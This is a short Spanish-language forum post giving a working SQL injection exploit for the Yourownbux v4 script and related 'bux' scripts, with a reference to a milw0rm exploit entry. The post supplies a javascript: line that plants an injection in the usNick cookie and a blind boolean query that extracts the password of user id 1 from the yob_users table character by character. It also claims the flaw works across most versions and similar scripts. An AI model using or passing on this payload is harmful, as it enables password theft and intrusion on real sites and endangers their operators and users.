Bueno mira, esos bugs de SQL Injection en Yourownbux y Scripts derivados de bugs los conocia yo desde hace mucho .. Pero nunca me anime mucho con ellos ..
Pero en estos dias Lo mande a milw0rm ( Repito, que no lo mande gracias a este post .. sino que ya los conocia pero nunca me anime a explotarlos ) .. En este caso para La version 4 de Yourownbux:
http://www.milw0rm.com/exploits/6693Ejemplo:
javascript:document.cookie="usNick=' AND 1=0 /*; expires=Thu, 2 Aug 2020 20:45:20 UTC; path=/";
Modificando ' AND 1=0 /* Por la inyeccion.
' AND ascii(substring((SELECT password FROM yob_users where id=1),1,1))=100 /*
Repito, lo de arriba es para la v4 aunque funciona en todas las versiones de yourownbux ( cambiando el nombre del archivo / tablas ) Y en la mayoria de los scripts " bux " ( Tambien esta presente en otros archivos ... Yourownbux tiene una mala validacion de Cookies .. en CASI TODOS los archivos .. )
Saludos